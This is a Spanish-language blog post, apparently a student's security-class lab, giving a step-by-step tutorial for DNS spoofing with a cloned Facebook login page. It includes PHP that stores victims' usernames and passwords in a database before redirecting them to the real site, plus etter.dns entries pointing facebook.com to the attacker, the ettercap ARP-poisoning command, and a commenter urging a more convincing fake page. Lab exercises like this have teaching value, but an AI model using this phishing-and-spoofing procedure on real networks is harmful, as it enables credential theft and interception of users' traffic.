Tutorial de la practica

1.       En este tutorial se realizara un DNS SPOOFING paso a paso:

   que es un DNS SPOOFING: es un método para alterar las direcciones de los servidores DNS que utiliza la potencial víctima y de esta forma poder tener control sobre las consultas que se realizan.

   Primero vamos a descargar la pagina de Facebook, para ello entramos desde nuestro navegador a www.facebook.com, damos clic derecho sobre la pagina y elegimos la opción guardar, ahora entramos a NetBeans y creamos una BD que se llamara face en la cual crearemos la tabla registros2 con dos campos que se llamaran user y pass cada uno de tipo varchar con una longitud de 30.
2.       El código que implementaremos en el index.php será el siguiente:
<form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">
                <input type="hidden" name="lsd" value="AVqX0AAv" autocomplete="off">
                <?php

if(isset($_POST["Registrar"]))
    {
include("conexion.php");

    $user=$_POST["user"];
    $pass=$_POST["pass"];
    {
        $sql="INSERT INTO registros2 (user,pass)values('$user','$pass');";
}
if(!mysql_query($sql))
    echo "No se pudieron registrar los datos";
else
   
     ?>
<br>
<br>
<br>
<br>
<br>
<br>
<meta http-equiv="Refresh" content="1;url=https://www.facebook.com/login.php?login_attempt=1">
<?php
}
else
?>
<form name="registros" action="https://localhost/Facebook1/index.php" method="POST">

En esta parte del codigo se manda llamar la conexion, la cual manda llamar el codigo de la base de datos y despues de hacer la suplantación te redirecciona a la pagina original de facebook.

3.       Ahora lo que vamos a hacer será guardar el proyecto en la página de xammp para que al abrir la página de localhos en nuestro navegador aparezca la página de Facebook falsa.
El proyecto quedara de la siguiente manera.

Y además de tener la carpeta en htdocs sacaremos la mayoría de los archivos ahí dentro y los pegaremos en lacarpeta htdocs, los archivos son los siguientes:

Esos archivos seleccionados los copiaremos y pegaremos en la carpeta de htdocs para que queden de la siuiente manera:

El xampp trae una pagina de index la tendremos que borrar para que quede solo la de Facebook falsa y asi poder verla en localhost:

Como se puede observar la dirección url es localhost.
Para continuar con el dns spoof se procede a realizar lo siguiente:

4.       Abrir vmware y cargar kali Linux, seleccionamos la opción Open a Virtual Machine.

Aquí seleccionamos kali Linux desde la ruta en la que esta almacenada, en este caso seria:
C: \Users\gaby\Documents\utna\decimo\seguridad informatica\victimas\kali-linux.1.0..

5.       Abrir otra ventana vmware y cargar una victima

6.       Abrir una terminal en kali Linux para sacar la dirección ip y la mac. Con el cmando ifconfig


7.       Sacar las direcciones ip y mac en mi caso:
00:0c:29:d8:82:d6 
          inet addr:192.168.31.139


8.       Tambien la mac y direccion Ip de la victima

Ejecutamos el comando ipconfig /all

En este caso sería:
Ip: 192.168.31.140
Mac: 00-0C-29-48-C2-5B

9.       Ahora sacamos la tabla arp de la víctima ejecutando el comando arp –a:

ARP
192.168.31.2
00-50-56-f3-58-1d


10.   Accedemos desde la victima a www.facebook.com  para verificar que aun accede a la pagina original

11.   Ahora localizaremos el archivo etter.dns y para ello ejecutamos el comando: locate etter.dns


12.   Ahora lo abrimos

13.   Ahora modificamos el archivo poniendo
·          www.facebook.com A 192.168.31.1
·         *.facebook.com A 192.168.31.1
·         http//www.facebook.com.mx A 192.168.31.1
La cual es la dirección IP del servidor.

14.   guardamos y salimos

15.   ahora activamos los servicios de http en la ubicación: Applications à Kali Linux à System Services à HTTP à apache 2 start, después de dar clic podremos ver una ventana que muestra que el servicio esta activado.



16.   ahora abriremos otra terminal para realizar el envenamiento con el comando:
ettercap –T –q –M arp:remote –P dns_spoof //

Donde:
-T ejecuta ettercap en modo texto
-q no imprime todos los mensajes
-M método argumento ataque MITM (Man In The Middle).
-p Plugin a usar que seriadns_spoof
// Son las maquinas en el segmento.


17.   ahora verificamos nuevamente la tabla arp de la victima para ver si coincide con la mac del atacante, nuevamente con el comando arp –a y verificamos que es la misma que el atacante:
00-0C-29-48-C2-5B
18.   ya que se realizo el envenenamiento se abre un navegador en la victima y se teclea la dirección www.facebook.com y asi veremos que la pagina a la que accede es falsa
Como podemos observar no es la pagina original de Facebook, ahora ingresamos los datos para obtenerlos desde phpmyadmin en localhost


19.   ahora aceedemos desde nuestra computadora a localhost/xampp y en la


Y en esta parte podremos verificar que se registró exitosamente:

Y pues prácticamente eso sería todo el proceso a seguir.






Comentarios

  1. te faltó mejorar la página falsa, cualquiera se habría dado cuenta de que no era la "buena" de face.

    Si le purdieras agragar una imagen de el redireccionamiento que sucede después de que te "robas" la contraseña junto con el código que usas, podrías mejorar la calificación de la tarea.

    no tengo calificación para tu práctica :(

    ResponderEliminar

Publicar un comentario